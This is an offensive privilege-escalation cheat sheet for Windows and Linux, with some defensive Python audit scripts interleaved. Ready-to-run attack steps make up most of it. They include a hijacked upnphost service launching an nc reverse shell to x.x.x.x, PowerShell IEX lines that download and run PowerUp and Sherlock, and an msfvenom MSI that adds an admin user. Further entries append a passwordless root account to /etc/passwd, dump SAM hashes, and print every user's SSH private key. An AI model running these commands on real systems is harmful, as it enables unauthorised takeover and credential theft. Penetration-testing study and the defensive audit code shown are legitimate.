Privilege escalation
One of the fun parts!

Windows

Windows versions

Clients

    Windows OS                        Version number
    Windows 1.0                       1.04
    Windows 2.0                       2.11
    Windows 3.0                       3
    Windows NT 3.1                    3.10.528
    Windows for Workgroups 3.11       3.11
    Windows NT Workstation 3.5        3.5.807
    Windows NT Workstation 3.51       3.51.1057
    Windows 95                        4.0.950
    Windows NT Workstation 4.0        4.0.1381
    Windows 98                        4.1.1998
    Windows 98 Second Edition         4.1.2222
    Windows Me                        4.90.3000
    Windows 2000 Professional         5.0.2195
    Windows XP                        5.1.2600
    Windows Vista                     6.0.6000
    Windows 7                         6.1.7600
    Windows 8.1                       6.3.9600
    Windows 10                        10.0.10240

Servers

    Windows NT 3.51                        NT 3.51
    Windows NT 3.5                         NT 3.50
    Windows NT 3.1                         NT 3.10
    Windows 2000                           NT 5.0
        Windows 2000 Server
        Windows 2000 Advanced Server
        Windows 2000 Datacenter Server
    Windows NT 4.0                         NT 4.0
        Windows NT 4.0 Server
        Windows NT 4.0 Server Enterprise
        Windows NT 4.0 Terminal Server Edition
    Windows Server 2003                    NT 5.2
        Windows Small Business Server 2003
        Windows Server 2003 Web Edition
        Windows Server 2003 Standard Edition
        Windows Server 2003 Enterprise Edition
        Windows Server 2003 Datacenter Edition
        Windows Storage Server
    Windows Server 2003 R2                 NT 5.2
        Windows Small Business Server 2003 R2
        Windows Server 2003 R2 Web Edition
        Windows Server 2003 R2 Standard Edition
        Windows Server 2003 R2 Enterprise Edition
        Windows Server 2003 R2 Datacenter Edition
        Windows Compute Cluster Server 2003 (CCS)
        Windows Storage Server
        Windows Home Server
    Windows Server 2008                    NT 6.0
        Windows Server 2008 Standard
        Windows Server 2008 Enterprise
        Windows Server 2008 Datacenter
        Windows Server 2008 for Itanium-based Systems
        Windows Server Foundation 2008
        Windows Essential Business Server 2008
        Windows HPC Server 2008
        Windows Small Business Server 2008
        Windows Storage Server 2008
        Windows Web Server 2008
    Windows Server 2008 R2                 NT 6.1
        Windows Server 2008 R2 Foundation
        Windows Server 2008 R2 Standard
        Windows Server 2008 R2 Enterprise
        Windows Server 2008 R2 Datacenter
        Windows Server 2008 R2 for Itanium-based Systems
        Windows Web Server 2008 R2
        Windows Storage Server 2008 R2
        Windows HPC Server 2008 R2
        Windows Small Business Server 2011
        Windows MultiPoint Server 2011
        Windows Home Server 2011
        Windows MultiPoint Server 2010
    Windows Server 2012                    NT 6.2
        Windows Server 2012 Foundation
        Windows Server 2012 Essentials
        Windows Server 2012 Standard
        Windows Server 2012 Datacenter
        Windows MultiPoint Server 2012
    Windows Server 2012 R2                 NT 6.3
        Windows Server 2012 R2 Foundation
        Windows Server 2012 R2 Essentials
        Windows Server 2012 R2 Standard
        Windows Server 2012 R2 Datacenter
    Windows Server 2016                    NT 10.0

Users

    whoami
    echo %username%
Which user privileges do we have?
    whoami /priv
Which users are there?
    net users
Maybe we are local admin already?
    net localgroup administrators
Credential manager
    cmdkey /list
Currently cached Kerberos tickets (and maybe some info about other network components)
    klist
Are there other logged-in users?
    qwinsta

Passwords

Password hashes

    /usr/share/windows-binaries/fgdump/fgdump.exe
    C:\> fgdump.exe
    C:\> type 127.0.0.1.pwdump
Reference: FGDump - aldeid
If the machine is a domain controller, search for "cpassword" within the Group Policy Preference XML files (groups.xml) in SYSVOL:
    findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml

Search for passwords

Search for files that contain "password" in the filename:
    dir /s *password*
Search for "password" in files:
    findstr /si password *.ini *.xml *.txt
    findstr /spin "password" *.*
Some common files:
    type c:\sysprep.inf
    type c:\sysprep\sysprep.xml
    type c:\unattend.xml
    type %WINDIR%\Panther\Unattend\Unattended.xml
    type %WINDIR%\Panther\Unattended.xml
    dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul

    dir c:*vnc.ini /s /b
    dir c:*ultravnc.ini /s /b
    dir c:\ /s /b | findstr /si *vnc.ini
Moaaahr files:
    %windir%\repair\sam
    %windir%\System32\config\RegBack\SAM
    %windir%\repair\system
    %windir%\repair\software
    %windir%\repair\security
    %windir%\debug\NetSetup.log (AD domain name, DC name, internal IP, DA account)
    %windir%\iis6.log (5, 6 or 7)
    %windir%\system32\logfiles\httperr\httperr1.log
    C:\sysprep.inf
    C:\sysprep\sysprep.inf
    C:\sysprep\sysprep.xml
    %windir%\Panther\Unattended.xml
    C:\inetpub\wwwroot\Web.config
    %windir%\system32\config\AppEvent.Evt (Application log)
    %windir%\system32\config\SecEvent.Evt (Security log)
    %windir%\system32\config\default.sav
    %windir%\system32\config\security.sav
    %windir%\system32\config\software.sav
    %windir%\system32\config\system.sav
    %windir%\system32\inetsrv\config\applicationHost.config
    %windir%\system32\inetsrv\config\schema\ASPNET_schema.xml
    %windir%\System32\drivers\etc\hosts (DNS entries)
    %windir%\System32\drivers\etc\networks (network settings)
    %windir%\system32\config\SAM (only really useful if you have access to the files while the machine is off)

Unquoted Service Path

    wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
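The wmic pipeline above hides its three conditions inside a chain of findstr filters. The following Python script is an added example (not from the original page) that applies the same rule explicitly to a constructed sample of wmic service get name,displayname,pathname,startmode output: the service starts automatically, its image path is not quoted, the executable path contains a space, and it is not under C:\Windows. Service names, display names and paths in the sample are invented for the example.

```python
import re

# Constructed sample of `wmic service get name,displayname,pathname,startmode`
# output. Names and paths are invented; columns are separated by two or
# more spaces, as in real wmic output.
SAMPLE_WMIC = """\
Name       DisplayName            PathName                                                     StartMode
Spooler    Print Spooler          C:\\Windows\\System32\\spoolsv.exe                              Auto
VulnSvc    Example Backup Agent   C:\\Program Files\\Example Corp\\Backup Agent\\agent.exe          Auto
SafeSvc    Example Updater        "C:\\Program Files\\Example Corp\\Updater\\upd.exe" -service     Auto
ManualSvc  Example Helper         C:\\Program Files\\Example Corp\\Helper\\helper.exe              Manual
"""

COLUMNS = ("name", "displayname", "pathname", "startmode")


def parse_wmic(text):
    """Split wmic's column-aligned output into dicts keyed by COLUMNS."""
    rows = []
    lines = [ln for ln in text.splitlines() if ln.strip()]
    for ln in lines[1:]:  # the first line is the header
        cols = re.split(r"\s{2,}", ln.strip())
        if len(cols) == len(COLUMNS):
            rows.append(dict(zip(COLUMNS, cols)))
    return rows


def image_path(pathname):
    """Return the executable portion of a service command line.

    A quoted path is returned without its quotes; an unquoted path is cut
    after the first '.exe', dropping any arguments that follow it.
    """
    p = pathname.strip()
    if p.startswith('"'):
        end = p.find('"', 1)
        return p[1:end] if end > 0 else p[1:]
    m = re.match(r"(.+?\.exe)", p, re.IGNORECASE)
    return m.group(1) if m else p


def is_unquoted_with_spaces(pathname):
    """True when the path is unquoted and the executable path contains a space."""
    p = pathname.strip()
    if p.startswith('"'):
        return False
    return " " in image_path(p)


def find_unquoted_auto_services(text):
    """Names of auto-start services outside C:\\Windows whose image path is unquoted and contains spaces."""
    hits = []
    for row in parse_wmic(text):
        if row["startmode"].lower() != "auto":
            continue
        if image_path(row["pathname"]).lower().startswith("c:\\windows\\"):
            continue
        if is_unquoted_with_spaces(row["pathname"]):
            hits.append(row["name"])
    return hits


if __name__ == "__main__":
    for name in find_unquoted_auto_services(SAMPLE_WMIC):
        print("unquoted service path:", name)
```

On the sample this reports only VulnSvc: Spooler lives under C:\Windows, SafeSvc has a quoted path, and ManualSvc does not start automatically. The fix on the service side is to quote the ImagePath and to make sure no directory along the path is writable by unprivileged users.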

AlwaysInstallElevated

Check if the following registry settings are set to "1":
    reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
    reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
If so, create your own malicious MSI that will add a local user:
    msfvenom -p windows/adduser USER=hodor PASS=Qwerty123! -f msi -o hodor.msi
And execute:
    msiexec /quiet /qn /i C:\hodor.msi
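The Windows Installer only honours AlwaysInstallElevated when the value is 1 under both HKLM and HKCU; a value in only one hive is ignored. The following Python snippet is an added example (not from the original page) that parses the two reg query outputs above and applies that rule, treating the "unable to find the specified registry key" error as 0. The output samples are constructed for the example.

```python
import re

# Constructed `reg query` output for the two keys named above; real
# values on a host will differ.
HKCU_SET = """\

HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

"""

HKLM_SET = """\

HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

"""

# What reg.exe prints when the value does not exist; the policy is then
# off for that hive.
HKLM_MISSING = "ERROR: The system was unable to find the specified registry key or value."

VALUE_RE = re.compile(r"AlwaysInstallElevated\s+REG_DWORD\s+0x([0-9a-fA-F]+)")


def parse_always_install_elevated(reg_output):
    """DWORD value of AlwaysInstallElevated in `reg query` output, or 0 when absent."""
    m = VALUE_RE.search(reg_output)
    return int(m.group(1), 16) if m else 0


def is_policy_effective(hkcu_output, hklm_output):
    """True only when the value is 1 in both HKCU and HKLM."""
    return (parse_always_install_elevated(hkcu_output) == 1
            and parse_always_install_elevated(hklm_output) == 1)


if __name__ == "__main__":
    print("effective:", is_policy_effective(HKCU_SET, HKLM_SET))      # True
    print("effective:", is_policy_effective(HKCU_SET, HKLM_MISSING))  # False
```

From the defender's side the check is the same: as long as at least one of the two values is absent or 0, MSI packages run by a standard user install with that user's rights only.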

upnp host

    sc qc upnphost
    sc config upnphost binpath= "C:\nc.exe -nv x.x.x.x -e C:\WINDOWS\System32\cmd.exe"
    sc config upnphost obj= ".\LocalSystem" password= ""
    sc qc upnphost
    net start upnphost
Got an error for a missing dependency?
    sc config SSDPSRV start= auto
    net start SSDPSRV
    net start upnphost
Or just remove the dependency:
    sc config upnphost depend= ""

Scheduled tasks

List scheduled tasks:
    schtasks /query /fo LIST /v
Running processes linked to services:
    tasklist /SVC

PowerShell tools

PowerUp.ps1

Checks for common Windows privesc vectors.
PowerTools/PowerUp.ps1 at master · PowerShellEmpire/PowerTools
Download on the target:
    IEX(New-Object Net.Webclient).downloadString('http://x.x.x.x:8000/PowerUp.ps1')
Add to the bottom of the script:
    Invoke-AllChecks
Run:
    powershell.exe -nop -exec bypass
    PS C:\> Import-Module .\PowerUp.ps1
    PS C:\> Invoke-AllChecks

Sherlock.ps1

Sherlock/Sherlock.ps1 at master · rasta-mouse/Sherlock
Download on the target:
    IEX(New-Object Net.Webclient).downloadString('http://x.x.x.x:8000/Sherlock.ps1')
Add to the bottom of the script:
    Find-AllVulns
Run:
    powershell.exe -nop -exec bypass
    PS C:\> Import-Module .\Sherlock.ps1
    PS C:\> Find-AllVulns

Nishang

GitHub - samratashok/nishang: Nishang - Offensive PowerShell for red team, penetration testing and offensive security.

Cross compiling

Compile a Windows exploit on Linux:
    i686-w64-mingw32-gcc 18176.c -lws2_32 -o 18176.exe
Compile a Python script to a Windows executable:
    wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile exploit.py

Misc

Windows remote exploits

    ms03-026
    ms03-039 (1)
    ms03-039 (2)
    ms03-049
    ms04-007
    ms04-011 - ssl bof
    ms04-011 - lsasarv.dll
    ms04-031
    ms05-017
    ms05-039
    ms06-040 (1)
    ms06-040 (2)
    ms06-070
    ms08-067 (1)
    ms08-067 (2)
    ms08-067 (3)
    ms09-050

Windows local exploits

    ms04-011
    ms04-019 (1)
    ms04-019 (2)
    ms04-019 (3)
    ms04-020
    keybd_event
    ms05-018
    ms05-055
    ms06-030
    ms06-049
    print spool service
    ms08-025
    netdde
    ms10-015
    ms10-059
    ms10-092
    ms11-080
    ms14-040
    ms14-058 (1)
    ms14-058 (2)
    ms14-070 (1)
    ms14-070 (2)
    ms15-010 (1)
    ms15-010 (2)
    ms15-051
    ms16-014
    ms16-016
    ms16-032

Precompiled exploits

GitHub - abatchy17/WindowsExploits: Windows exploits, mostly precompiled. Not being updated. Check https://github.com/SecWiki/windows-kernel-exploits instead.
http://www.bhafsec.com/wiki/index.php/Windows_Privilege_Escalation
GitHub - SecWiki/windows-kernel-exploits: windows-kernel-exploits Windows平台提权漏洞集合

Linux

Sudo

    cat /etc/sudoers
    sudo -l
Becoming a super hero is a fairly straightforward process:
    root ALL=(ALL) ALL
The root user can execute from ALL terminals, acting as ALL (any) users, and run ALL (any) command.
    john ALL= /sbin/poweroff
The user john can, from any terminal, run the command poweroff using john's user password.
    john ALL = (root) NOPASSWD: /usr/bin/scp
The user john can, from any terminal, run the command scp as the root user without a password.
Below is a selection from g0tmi1k's privesc blog which I use a lot.
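The three sudoers lines above follow the same grammar: user, host list, "=", an optional "(runas)" list, optional tags such as NOPASSWD:, and the command list; when the runas list is omitted, sudo runs the command as root. The following Python script is an added example (not from the original page, not from g0tmi1k's blog) that parses user specification lines of that shape and flags the two things an auditor reads sudoers for: NOPASSWD grants and unrestricted (ALL) command grants to non-root users. The sudoers excerpt is constructed from the page's three examples plus a comment and a Defaults line that the parser must skip.

```python
import re

# Constructed sudoers excerpt: the three entries discussed above plus
# lines that are not user specifications.
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed example)
Defaults env_reset
root ALL=(ALL) ALL
john ALL= /sbin/poweroff
john ALL = (root) NOPASSWD: /usr/bin/scp
"""

# user  host_list = [(runas_list)] [TAG: ...] cmd_list
SPEC_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<hosts>[^\s=]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)


def parse_sudoers(text):
    """Parse user specification lines into dicts; skip comments, blanks and Defaults."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = SPEC_RE.match(line)
        if not m:
            continue
        tags = [t.rstrip(":") for t in m.group("tags").split()]
        runas = m.group("runas")
        entries.append({
            "user": m.group("user"),
            "hosts": m.group("hosts"),
            # No "(runas)" list means the command runs as root.
            "runas": runas.strip() if runas else "root",
            "nopasswd": "NOPASSWD" in tags,
            "cmds": [c.strip() for c in m.group("cmds").split(",")],
        })
    return entries


def audit_sudoers(text):
    """(user, finding) pairs for NOPASSWD grants and ALL-command grants to non-root users."""
    findings = []
    for e in parse_sudoers(text):
        if e["user"] == "root":
            continue
        if "ALL" in e["cmds"]:
            findings.append((e["user"], "can run ALL commands as %s" % e["runas"]))
        if e["nopasswd"]:
            findings.append((e["user"], "NOPASSWD for %s as %s" % (", ".join(e["cmds"]), e["runas"])))
    return findings


if __name__ == "__main__":
    for user, finding in audit_sudoers(SAMPLE_SUDOERS):
        print(user, "-", finding)
```

On the sample the only finding is john's NOPASSWD grant for /usr/bin/scp as root; the poweroff entry still needs john's password and is not flagged. The parser handles plain user specifications only; aliases, #include directives and sudoers.d fragments would need to be expanded first.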

Distribution type & kernel version

    cat /etc/*release*
    uname -a
    rpm -q kernel
    dmesg | grep -i linux

Default writeable directory / folder

    /tmp
    /dev/shm

Search for passwords

Search for "password" within config.php:
    grep -R 'password' config.php
Search the whole system:
    find / -type f -exec grep -H 'password' {} \; 2>/dev/null
    grep -R -i "password" 2> >(grep -v 'Permission denied' >&2)
Moaaar grepping:
    grep -i user [filename]
    grep -i pass [filename]
    grep -C 5 "password" [filename]
    find . -name "*.php" -print0 | xargs -0 grep -i -n 'var $password'

Find possible other writeable directory / folder

    find / -type d \( -perm -g+w -or -perm -o+w \) -exec ls -adl {} \;

Service(s) running as root user

    ps aux | grep root
    ps -ef | grep root

Installed applications

    ls -lah /usr/bin/
    ls -lah /sbin/
    dpkg -l
    rpm -qa
    ls -lah /var/cache/apt/archives/
    ls -lah /var/cache/yum/

Scheduled jobs

    crontab -l
    ls -la /etc/cron*
    ls -lah /var/spool/cron
    ls -la /etc/ | grep cron
    cat /etc/crontab
    cat /etc/anacrontab

Search for juicy shizzle

Find pattern in file:

    grep -rnw '/etc/passwd' -e 'root'

SSH

Host keys

authorized_keys: Contains the public keys of any authorised client(s); in other words, it specifies the SSH keys that can be used to log into the user account for which the file is configured. This file lets the server authenticate the user.
id_rsa: Contains the private key for the client. This RSA key can be used with SSH protocols 1 or 2.
id_rsa.pub: Contains the public key for the client.
id_dsa: Contains the private key for the client. This (insecure) DSA key can only be used with SSH protocol 2.
id_dsa.pub: Contains the public key for the client.
known_hosts: Contains a list of host signatures for hosts the client has ever connected to.

Search for RSA private keys

    #!/bin/bash
    for X in $(cut -f6 -d ':' /etc/passwd | sort | uniq); do
        if [ -s "${X}/.ssh/id_rsa" ]; then
            echo "### ${X}: "
            cat "${X}/.ssh/id_rsa"
            echo ""
        fi
    done

Search for DSA private keys

    #!/bin/bash
    for X in $(cut -f6 -d ':' /etc/passwd | sort | uniq); do
        if [ -s "${X}/.ssh/id_dsa" ]; then
            echo "### ${X}: "
            cat "${X}/.ssh/id_dsa"
            echo ""
        fi
    done

Sticky bit, SGID, SUID

Sticky bit (chmod 1000):
    find / -perm -1000 -type d 2>/dev/null
SGID (chmod 2000):
    find / -perm -g=s -type f 2>/dev/null
SUID (chmod 4000):
    find / -perm -u=s -type f 2>/dev/null
    find /* -user root -perm -4000 -print 2>/dev/null
SUID or SGID (the parentheses are needed so that -type f applies to both branches of the -o):
    find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null

Example SUID exploitation

The following file has the SUID bit set:
    /usr/bin/nano
We can use this to execute nano and then add a new root user to /etc/passwd. The next step is to create a password hash for "hodor" with salt "hodor":
    perl -e 'print crypt("hodor", "hodor"),"\n"'
Add to /etc/passwd using nano:
    hodor:how7QNOjM.95M:0:0:root:/root:/bin/bash
Switch to the new user:
    su hodor

Add user to /etc/passwd and root group

    echo hodor::0:0:root:/root:/bin/bash >> /etc/passwd
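Both /etc/passwd lines above leave a clear trace: a second account with UID 0, a password hash sitting in /etc/passwd instead of /etc/shadow, or an empty password field. The following Python script is an added example (not from the original page) that parses /etc/passwd content and reports exactly those three conditions, so the technique described here can be checked for on a host. The passwd contents below are constructed for the example and include the page's two hodor lines.

```python
# Constructed /etc/passwd contents: a normal layout plus the two kinds of
# lines shown above (an extra UID-0 user carrying a hash in the password
# field, and one with an empty password field).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
hodor:how7QNOjM.95M:0:0:root:/root:/bin/bash
hodor2::0:0:root:/root:/bin/bash
"""

# Password-field values that mean "no hash here": shadowed or locked.
SHADOWED_OR_LOCKED = ("x", "*", "!", "!!")


def parse_passwd(text):
    """Yield (name, passwd_field, uid, gid, gecos, home, shell) for each well-formed line."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        try:
            uid_i, gid_i = int(uid), int(gid)
        except ValueError:
            continue
        yield (name, pw, uid_i, gid_i, gecos, home, shell)


def audit_passwd(text):
    """Return (username, finding) pairs for entries that point at a tampered /etc/passwd."""
    findings = []
    for name, pw, uid, _gid, _gecos, _home, _shell in parse_passwd(text):
        if uid == 0 and name != "root":
            findings.append((name, "extra UID 0 account"))
        if pw == "":
            findings.append((name, "empty password field (no password required)"))
        elif pw not in SHADOWED_OR_LOCKED and not pw.startswith("!"):
            findings.append((name, "password hash stored in /etc/passwd instead of /etc/shadow"))
    return findings


if __name__ == "__main__":
    for user, finding in audit_passwd(SAMPLE_PASSWD):
        print(user, "-", finding)
```

Run against a real file with audit_passwd(open("/etc/passwd").read()); on an untampered system the list is empty. A locked entry such as "!" or "!!" (RHEL) or a hash prefixed with "!" is deliberately not reported.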

Enumeration tools

Linux local exploits

    kernel 2.4.x / 2.6.x (sock_sendpage 1)
    kernel 2.4 / 2.6 (sock_sendpage 2)
    kernel < 2.6.22 (ftruncate)
    kernel < 2.6.34 (cap_sys_admin)
    kernel 2.6.27 < 2.6.36 (compat)
    kernel < 2.6.36-rc1 (can bcm)
    kernel <= 2.6.36-rc8 (rds protocol)
    kernel < 2.6.36.2 (half nelson)
    kernel <= 2.6.37 (full nelson)
    kernel 2.6 (udev)
    kernel 3.13 (sgid)
    kernel 3.13.0 < 3.19 (overlayfs 1)
    kernel 3.14.5 (libfutex)
    kernel 2.6.39 <= 3.2.2 (mempodipper)
    *kernel 2.6.28 / 3.0 (alpha-omega)
    kernel 2.6.22 < 3.9 (Dirty Cow)
    kernel 3.7.6 (msr)
    *kernel < 3.8.9 (perf_swevent_init)
    kernel <= 4.3.3 (overlayfs 2)
    kernel 4.3.3 (overlayfs 3)
    kernel 4.4.0 (af_packet)
    kernel 4.4.x (double-fdput)
    kernel 4.4.0-21 (netfilter)
    kernel 4.4.1 (refcount)

Precompiled exploits

GitHub - SecWiki/linux-kernel-exploits: linux-kernel-exploits Linux平台提权漏洞集合
GitHub - xairy/linux-kernel-exploitation: A collection of links related to Linux kernel security and exploitation